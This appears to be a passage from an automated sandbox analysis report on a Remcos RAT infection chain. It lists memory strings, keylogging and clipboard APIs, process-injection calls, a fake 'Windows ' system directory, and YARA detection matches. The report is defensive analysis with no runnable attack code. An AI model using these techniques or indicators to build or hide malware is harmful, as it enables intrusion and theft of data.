Source: bhv3B03.tmp.47.dr String found in binary or memory: http://ocsp.digicert.com0:
Source: bhv3B03.tmp.47.dr String found in binary or memory: http://ocsp.digicert.com0H
Source: bhv3B03.tmp.47.dr String found in binary or memory: http://ocsp.digicert.com0I
Source: bhv3B03.tmp.47.dr String found in binary or memory: http://ocsp.digicert.com0Q
Source: bhv3B03.tmp.47.dr String found in binary or memory: http://ocsp.msocsp.com0
Source: bhv3B03.tmp.47.dr String found in binary or memory: http://ocsp.msocsp.com0S
Source: bhv3B03.tmp.47.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: bhv3B03.tmp.47.dr String found in binary or memory: http://www.digicert.com/CPS0~
Source: recover.exe, recover.exe, 00000035.00000002.2097993419.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.ebuddy.com
Source: recover.exe, recover.exe, 00000035.00000003.2097195467.000000000316D000.00000004.00000020.00020000.00000000.sdmp, recover.exe, 00000035.00000002.2097993419.0000000000400000.00000040.80000000.00040000.00000000.sdmp, recover.exe, 00000035.00000003.2097309040.000000000316D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.imvu.com
Source: recover.exe, 00000035.00000003.2097195467.000000000316D000.00000004.00000020.00020000.00000000.sdmp, recover.exe, 00000035.00000003.2097309040.000000000316D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.imvu.coma
Source: recover.exe, 00000035.00000002.2097993419.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
Source: recover.exe, 00000035.00000002.2097993419.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.imvu.comr
Source: recover.exe, 0000002F.00000002.2133255398.00000000005F4000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: http://www.nirsoft.net
Source: recover.exe, 00000035.00000002.2097993419.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.nirsoft.net/
Source: ANYDESK.PIF, 0000001A.00000003.1821868863.000000007E863000.00000004.00001000.00020000.00000000.sdmp, ANYDESK.PIF, 0000001A.00000002.1881559620.000000007EDF0000.00000004.00001000.00020000.00000000.sdmp, ANYDESK.PIF, 0000001A.00000002.1859269663.00000000208AA000.00000004.00001000.00020000.00000000.sdmp, ANYDESK.PIF, 0000001A.00000003.1821868863.000000007E8DE000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.pmail.com
Source: ghf.pif, 00000014.00000000.1782654127.00007FF789D1E000.00000002.00000001.01000000.00000009.sdmp, ghf.pif.18.dr String found in binary or memory: https://%ws/%ws_%ws_%ws/service.svc/%wsADPolicyProviderSCEP
Source: bhv3B03.tmp.47.dr String found in binary or memory: https://0bf8c87e7673b17d24aaf92c4c29ca42.azr.footprintdns.com/apc/trans.gif?6cc2fc022d35de4436d46235
Source: bhv3B03.tmp.47.dr String found in binary or memory: https://0bf8c87e7673b17d24aaf92c4c29ca42.azr.footprintdns.com/apc/trans.gif?97ae33b93885af7139d3f9b0
Source: bhv3B03.tmp.47.dr String found in binary or memory: https://6a1824ae7f5b378648db1f87c4a047c1.azr.footprintdns.com/apc/trans.gif?6aff50c04f9af0461603c0c1
Source: bhv3B03.tmp.47.dr String found in binary or memory: https://6a1824ae7f5b378648db1f87c4a047c1.azr.footprintdns.com/apc/trans.gif?e4d500512ddeced1b68e7640
Source: bhv3B03.tmp.47.dr String found in binary or memory: https://9cf1d93416b343cbb0aa1deae6dc7661.azr.footprintdns.com/apc/trans.gif?67e56b9b06a4d427a359554f
Source: bhv3B03.tmp.47.dr String found in binary or memory: https://9cf1d93416b343cbb0aa1deae6dc7661.azr.footprintdns.com/apc/trans.gif?b4ef4344b8bbbc91cc6b3006
Source: bhv3B03.tmp.47.dr String found in binary or memory: https://M365CDN.nel.measure.office.net/api/report?FrontEnd=AkamaiCDNWorldWide&DestinationEndpoint=EL
Source: bhv3B03.tmp.47.dr String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaot
Source: bhv3B03.tmp.47.dr String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaotak
Source: bhv3B03.tmp.47.dr String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingrms
Source: bhv3B03.tmp.47.dr String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth
Source: bhv3B03.tmp.47.dr String found in binary or memory: https://aefd.nelreports.net/api/report?cat=wsb
Source: bhv3B03.tmp.47.dr String found in binary or memory: https://aefd.nelreports.net/api/report?cat=wsb&ndcParam=QWthbWFp
Source: bhv3B03.tmp.47.dr String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: bhv3B03.tmp.47.dr String found in binary or memory: https://config.edge.skype.com/config/v1/ODSP_Sync_Client/19.043.0304.0013?UpdateRing=Prod&OS=Win&OSV
Source: bhv3B03.tmp.47.dr String found in binary or memory: https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat
Source: bhv3B03.tmp.47.dr String found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: bhv3B03.tmp.47.dr String found in binary or memory: https://ebd871449a8dbfc3efbaabaef620b095.clo.footprintdns.com/apc/trans.gif?2b5ac21b953982869b52cfd6
Source: bhv3B03.tmp.47.dr String found in binary or memory: https://ebd871449a8dbfc3efbaabaef620b095.clo.footprintdns.com/apc/trans.gif?b53a91fd779d41798d7818ff
Source: bhv3B03.tmp.47.dr String found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-LAX31r5a&
Source: bhv3B03.tmp.47.dr String found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-LAXr4b&Fr
Source: bhv3B03.tmp.47.dr String found in binary or memory: https://fp-afd.azurefd.net/apc/trans.gif?2b2f77512f7c65b2f52ee30ffe87d61a
Source: bhv3B03.tmp.47.dr String found in binary or memory: https://fp-afd.azurefd.net/apc/trans.gif?355cac43462bdbbb118c6145bdcc88c0
Source: bhv3B03.tmp.47.dr String found in binary or memory: https://fp-afd.azurefd.net/apc/trans.gif?42704eed386765f870e05e14b5b322b7
Source: bhv3B03.tmp.47.dr String found in binary or memory: https://fp-afd.azurefd.net/apc/trans.gif?b21ec88677686eb844798ccd641c5fe5
Source: bhv3B03.tmp.47.dr String found in binary or memory: https://fp-vp-nocache.azureedge.net/apc/trans.gif?086008d5de6d8b19567a45da7804f652
Source: bhv3B03.tmp.47.dr String found in binary or memory: https://fp-vp-nocache.azureedge.net/apc/trans.gif?79007fa287900ed2975a809f346f1f62
Source: bhv3B03.tmp.47.dr String found in binary or memory: https://fp.msedge.net/conf/v1/asgw/fpconfig.min.json
Source: bhv3B03.tmp.47.dr String found in binary or memory: https://fp.msedge.net/conf/v2/asgw/fpconfig.min.json?monitorId=asgw
Source: bhv3B03.tmp.47.dr String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: bhv3B03.tmp.47.dr String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: bhv3B03.tmp.47.dr String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: ghf.pif, 00000014.00000000.1782654127.00007FF789D1E000.00000002.00000001.01000000.00000009.sdmp, ghf.pif.18.dr String found in binary or memory: https://login.microsoftonline.com/%s/oauth2/authorizeJoinStatusStorage::SetDefaultDiscoveryMetadatah
Source: recover.exe String found in binary or memory: https://login.yahoo.com/config/login
Source: bhv3B03.tmp.47.dr String found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v22057_4HqSCTf5FFStBMz0_eIqyA2.css
Source: bhv3B03.tmp.47.dr String found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v22057_sKiljltKC1Ne_Y3fl1HuHQ2.css
Source: bhv3B03.tmp.47.dr String found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en-gb_BxKM4IRLudkIao5qo
Source: bhv3B03.tmp.47.dr String found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en-gb_RP-iR89BipE4i7ZOq
Source: bhv3B03.tmp.47.dr String found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_AI1nyU_u3YQ_at1fSBm4Uw2.js
Source: bhv3B03.tmp.47.dr String found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_tSc0Su-bb7Jt0QVuF6v9Cg2.js
Source: bhv3B03.tmp.47.dr String found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js
Source: bhv3B03.tmp.47.dr String found in binary or memory: https://maps.windows.com/windows-app-web-link
Source: bhv3B03.tmp.47.dr String found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2022-09-17-00-05-23/PreSignInSettingsConfig.json
Source: bhv3B03.tmp.47.dr String found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2022-09-17-00-05-23/PreSignInSettingsConfig.json?One
Source: bhv3B03.tmp.47.dr String found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2023-10-06-09-30-15/PreSignInSettingsConfig.json
Source: bhv3B03.tmp.47.dr String found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2023-10-06-09-30-15/PreSignInSettingsConfig.json?One
Source: bhv3B03.tmp.47.dr String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/update100.xml?OneDriveUpdate=b12f1ec5da72bf506d52
Source: bhv3B03.tmp.47.dr String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/741e3e8c607c445262f3add0e58b18f19e0502af.xml?OneDriveUpdate=e0a3ca
Source: bhv3B03.tmp.47.dr String found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?2bedfa25f63b1e1b9bd24eb0a5625631
Source: bhv3B03.tmp.47.dr String found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?f60497627d681e8f4d8561fad4b92959
Source: bhv3B03.tmp.47.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/ew-preload-inline-2523c8c1505f1172be19.js
Source: bhv3B03.tmp.47.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/otel-logger-104bffe9378b8041455c.js
Source: bhv3B03.tmp.47.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-35de8a913e.css
Source: bhv3B03.tmp.47.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-async-styles.a903b7d0ab82e5bd2f8a.chunk.v7.css
Source: bhv3B03.tmp.47.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bootstrap-5e7af218e953d095fabf.js
Source: bhv3B03.tmp.47.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-3a99f64809c6780df035.js
Source: bhv3B03.tmp.47.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-994d8943fc9264e2f8d3.css
Source: bhv3B03.tmp.47.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-fluent~left-nav-rc.ac5cfbeadfd63fc27ffd.chunk.v7.js
Source: bhv3B03.tmp.47.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-forms-group~mru~officeforms-group-forms~officeforms
Source: bhv3B03.tmp.47.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-left-nav-rc.68ab311bcca4f86f9ef5.chunk.v7.js
Source: bhv3B03.tmp.47.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-mru.2ce72562ad7c0ae7059c.chunk.v7.js
Source: bhv3B03.tmp.47.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendor-bundle-ba2888a24179bf152f3d.js
Source: bhv3B03.tmp.47.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.169ce481376dceef3ef6.chunk.v7.c
Source: bhv3B03.tmp.47.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.b24d6b48aeb44c7b5bf6.chunk.v7.j
Source: bhv3B03.tmp.47.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwaunauth-9d8bc214ac.css
Source: bhv3B03.tmp.47.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedfontstyles-27fa2598d8.css
Source: bhv3B03.tmp.47.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedscripts-939520eada.js
Source: bhv3B03.tmp.47.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticpwascripts-30998bff8f.js
Source: bhv3B03.tmp.47.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticstylesfabric-35c34b95e3.css
Source: bhv3B03.tmp.47.dr String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/hero-image-desktop-f6720a4145.jpg
Source: bhv3B03.tmp.47.dr String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/lockup-mslogo-color-78c06e8898.png
Source: bhv3B03.tmp.47.dr String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/microsoft-365-logo-01d5ecd01a.png
Source: bhv3B03.tmp.47.dr String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-apps-image-46596a6856.png
Source: bhv3B03.tmp.47.dr String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-checkmark-image-1999f0bf81.png
Source: bhv3B03.tmp.47.dr String found in binary or memory: https://res.cdn.office.net/officehub/versionless/officehome/thirdpartynotice.html
Source: bhv3B03.tmp.47.dr String found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_regular.woff2
Source: bhv3B03.tmp.47.dr String found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_semibold.woff2
Source: bhv3B03.tmp.47.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: recover.exe, recover.exe, 00000035.00000002.2097993419.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: recover.exe String found in binary or memory: https://www.google.com/accounts/servicelogin
Source: bhv3B03.tmp.47.dr String found in binary or memory: https://www.office.com/

Key, Mouse, Clipboard, Microphone and Screen Capturing
barindex
Contains functionality to register a low level keyboard hook
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 62_2_00409D1E SetWindowsHookExA 0000000D,00409D0A,00000000 62_2_00409D1E
Contains functionality for read data from the clipboard
Source: C:\Windows\SysWOW64\recover.exe Code function: 47_2_0041138D OpenClipboard,GetLastError,DeleteFileW, 47_2_0041138D
Contains functionality to modify clipboard data
Source: C:\Windows\SysWOW64\recover.exe Code function: 47_2_00409E39 EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard, 47_2_00409E39
Source: C:\Windows\SysWOW64\recover.exe Code function: 47_2_00409EA1 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard, 47_2_00409EA1
Source: C:\Windows\SysWOW64\recover.exe Code function: 49_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard, 49_2_00406DFC
Source: C:\Windows\SysWOW64\recover.exe Code function: 49_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard, 49_2_00406E9F
Source: C:\Windows\SysWOW64\recover.exe Code function: 53_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard, 53_2_004068B5
Source: C:\Windows\SysWOW64\recover.exe Code function: 53_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard, 53_2_004072B5
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 62_2_0041696E OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard, 62_2_0041696E
Contains functionality to read the clipboard data
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 62_2_0040B158 OpenClipboard,GetClipboardData,CloseClipboard, 62_2_0040B158
Contains functionality to retrieve information about pressed keystrokes
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 62_2_00409E4A GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx, 62_2_00409E4A
Yara detected Keylogger Generic
Source: Yara match File source: 62.2.SndVol.exe.6831a8e.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 62.2.SndVol.exe.6831a8e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 62.2.SndVol.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 62.2.SndVol.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000003E.00000002.2145980363.0000000006831000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000003E.00000002.2141597458.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: ANYDESK.PIF PID: 1944, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: SndVol.exe PID: 6808, type: MEMORYSTR

E-Banking Fraud
barindex
Yara detected Remcos RAT
Source: Yara match File source: 62.2.SndVol.exe.6831a8e.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 62.2.SndVol.exe.6831a8e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 62.2.SndVol.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 62.2.SndVol.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000023.00000003.2138790179.000000000318C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.2138790179.000000000315E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.2138790179.000000000317C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000002.2293950327.0000000003195000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000002.2293950327.000000000315E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000003E.00000002.2145980363.0000000006831000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000003E.00000002.2141597458.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000003E.00000002.2144370193.0000000003110000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000002.2293950327.0000000003180000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: colorcpl.exe PID: 4452, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: SndVol.exe PID: 6808, type: MEMORYSTR

Spam, unwanted Advertisements and Ransom Demands
barindex
Contains functionalty to change the wallpaper
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 62_2_0041CF2D SystemParametersInfoW, 62_2_0041CF2D
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 62_2_0684DDBB SystemParametersInfoW, 62_2_0684DDBB

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 62.2.SndVol.exe.6831a8e.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 62.2.SndVol.exe.6831a8e.1.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 62.2.SndVol.exe.6831a8e.1.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 62.2.SndVol.exe.6831a8e.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 62.2.SndVol.exe.6831a8e.1.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 62.2.SndVol.exe.6831a8e.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 62.2.SndVol.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 62.2.SndVol.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 62.2.SndVol.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 62.2.SndVol.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 62.2.SndVol.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 62.2.SndVol.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0000003E.00000002.2145980363.0000000006831000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000003E.00000002.2141597458.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000003E.00000002.2141597458.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000003E.00000002.2141597458.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: Process Memory Space: SndVol.exe PID: 6808, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Contains functionality to call native functions
Source: C:\Users\Public\ANYDESK.PIF Code function: 26_2_02B13380 NtWriteVirtualMemory, 26_2_02B13380
Source: C:\Users\Public\ANYDESK.PIF Code function: 26_2_02B13034 NtAllocateVirtualMemory, 26_2_02B13034
Source: C:\Users\Public\ANYDESK.PIF Code function: 26_2_02B19654 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose, 26_2_02B19654
Source: C:\Users\Public\ANYDESK.PIF Code function: 26_2_02B19738 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose, 26_2_02B19738
Source: C:\Users\Public\ANYDESK.PIF Code function: 26_2_02B195CC RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile, 26_2_02B195CC
Source: C:\Users\Public\ANYDESK.PIF Code function: 26_2_02B16AE0 GetModuleHandleW,NtOpenProcess,IsBadReadPtr,IsBadReadPtr,GetModuleHandleW,NtCreateThreadEx, 26_2_02B16AE0
Source: C:\Users\Public\ANYDESK.PIF Code function: 26_2_02B1421A GetThreadContext,SetThreadContext,NtResumeThread, 26_2_02B1421A
Source: C:\Users\Public\ANYDESK.PIF Code function: 26_2_02B1421C GetThreadContext,SetThreadContext,NtResumeThread, 26_2_02B1421C
Source: C:\Users\Public\ANYDESK.PIF Code function: 26_2_02B13032 NtAllocateVirtualMemory, 26_2_02B13032
Source: C:\Users\Public\ANYDESK.PIF Code function: 26_2_02B19578 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile, 26_2_02B19578
Source: C:\Users\Public\ANYDESK.PIF Code function: 26_2_02B1399C NtProtectVirtualMemory, 26_2_02B1399C
Source: C:\Windows\SysWOW64\recover.exe Code function: 47_2_0040BAE3 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle, 47_2_0040BAE3
Source: C:\Windows\SysWOW64\recover.exe Code function: 49_2_004016FD NtdllDefWindowProc_A, 49_2_004016FD
Source: C:\Windows\SysWOW64\recover.exe Code function: 49_2_004017B7 NtdllDefWindowProc_A, 49_2_004017B7
Source: C:\Windows\SysWOW64\recover.exe Code function: 53_2_00402CAC NtdllDefWindowProc_A, 53_2_00402CAC
Source: C:\Windows\SysWOW64\recover.exe Code function: 53_2_00402D66 NtdllDefWindowProc_A, 53_2_00402D66
Source: C:\Users\Public\ANYDESK.PIF Code function: 60_2_02A36AE0 GetModuleHandleW,NtOpenProcess,IsBadReadPtr,IsBadReadPtr,GetModuleHandleW,NtCreateThreadEx, 60_2_02A36AE0
Source: C:\Users\Public\ANYDESK.PIF Code function: 60_2_02A33380 NtWriteVirtualMemory, 60_2_02A33380
Source: C:\Users\Public\ANYDESK.PIF Code function: 60_2_02A33034 NtAllocateVirtualMemory, 60_2_02A33034
Source: C:\Users\Public\ANYDESK.PIF Code function: 60_2_02A39738 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose, 60_2_02A39738
Source: C:\Users\Public\ANYDESK.PIF Code function: 60_2_02A33A34 NtProtectVirtualMemory, 60_2_02A33A34
Source: C:\Users\Public\ANYDESK.PIF Code function: 60_2_02A3421A Toolhelp32ReadProcessMemory,Thread32Next,GetThreadContext,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Toolhelp32ReadProcessMemory,Heap32ListFirst,SetThreadContext,NtResumeThread,Thread32Next, 60_2_02A3421A
Source: C:\Users\Public\ANYDESK.PIF Code function: 60_2_02A3421C Toolhelp32ReadProcessMemory,Thread32Next,GetThreadContext,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Toolhelp32ReadProcessMemory,Heap32ListFirst,SetThreadContext,NtResumeThread,Thread32Next, 60_2_02A3421C
Source: C:\Users\Public\ANYDESK.PIF Code function: 60_2_02A33032 NtAllocateVirtualMemory, 60_2_02A33032
Source: C:\Users\Public\ANYDESK.PIF Code function: 60_2_02A39809 NtQueryInformationFile,NtReadFile,NtClose, 60_2_02A39809
Source: C:\Users\Public\ANYDESK.PIF Code function: 60_2_02A3399C NtProtectVirtualMemory, 60_2_02A3399C
Source: C:\Users\Public\ANYDESK.PIF Code function: 60_2_02A39654 RtlDosPathNameToNtPathName_U,NtWriteFile,NtClose, 60_2_02A39654
Source: C:\Users\Public\ANYDESK.PIF Code function: 60_2_02A3341B NtWriteVirtualMemory, 60_2_02A3341B
Source: C:\Users\Public\ANYDESK.PIF Code function: 60_2_02A395CC RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile, 60_2_02A395CC
Source: C:\Users\Public\ANYDESK.PIF Code function: 60_2_02A39578 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile, 60_2_02A39578
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 62_2_0041C077 OpenProcess,NtSuspendProcess,CloseHandle, 62_2_0041C077
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 62_2_0041C0A3 OpenProcess,NtResumeProcess,CloseHandle, 62_2_0041C0A3
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 62_2_0684CF05 OpenProcess,NtSuspendProcess,CloseHandle, 62_2_0684CF05
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 62_2_0684CF31 OpenProcess,NtResumeProcess,CloseHandle, 62_2_0684CF31
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 62_2_0684EB56 NtdllDefWindowProc_A,GetCursorPos,SetForegroundWindow,TrackPopupMenu,IsWindowVisible,ShowWindow,ShowWindow,SetForegroundWindow,Shell_NotifyIcon,ExitProcess,CreatePopupMenu,AppendMenuA, 62_2_0684EB56
Contains functionality to launch a process as a different user
Source: C:\Users\Public\ANYDESK.PIF Code function: 26_2_02B1A634 InetIsOffline,Sleep,CreateProcessAsUserW,ResumeThread,CloseHandle,CloseHandle,ExitProcess, 26_2_02B1A634
Contains functionality to shutdown / reboot the system
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 62_2_00416861 ExitWindowsEx,LoadLibraryA,GetProcAddress, 62_2_00416861
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 62_2_068476F1 ExitWindowsEx,LoadLibraryA,GetProcAddress, 62_2_068476F1
Creates files inside the system directory
Source: C:\Users\Public\alpha.pif File created: C:\Windows Jump to behavior
Source: C:\Users\Public\alpha.pif File created: C:\Windows \SysWOW64 Jump to behavior
Detected potential crypto function
Source: C:\Users\Public\ANYDESK.PIF Code function: 26_2_02B020B4 26_2_02B020B4
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 35_2_05377194 35_2_05377194
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 35_2_0536B5C1 35_2_0536B5C1
Source: C:\Windows\SysWOW64\recover.exe Code function: 47_2_0044A030 47_2_0044A030
